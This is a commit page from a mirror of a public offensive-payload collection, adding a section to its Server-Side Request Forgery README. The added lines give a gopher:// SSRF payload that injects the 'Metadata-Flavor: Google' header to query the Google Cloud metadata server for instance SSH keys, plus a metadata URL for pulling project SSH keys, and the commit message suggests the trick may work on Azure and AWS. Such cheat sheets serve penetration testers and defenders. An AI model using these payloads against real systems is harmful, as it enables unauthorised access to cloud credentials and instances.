ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-01-29 14:45:04 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Added anti-SSRF header bypass for GCP. Similar technique works on Azure and AWS I'm guessing.

Browse Source
This commit is contained in:
mikesiegel 2019-12-31 15:07:20 +00:00
parent 0a6ac284c9
commit 7aa2761e3e
1 changed files with 5 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
Server Side Request Forgery/README.md
View File

@ -501,6 +501,11 @@ http://metadata.google.internal/computeMetadata/v1beta1/
http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true
```
Required headers can be set using a gopher SSRF with the following technique
```powershell
gopher://metadata.google.internal:80/xGET%20/computeMetadata/v1/instance/attributes/ssh-keys%20HTTP%2f%31%2e%31%0AHost:%20metadata.google.internal%0AAccept:%20%2a%2f%2a%0aMetadata-Flavor:%20Google%0d%0a``
Interesting files to pull out:
- SSH Public Key : `http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json`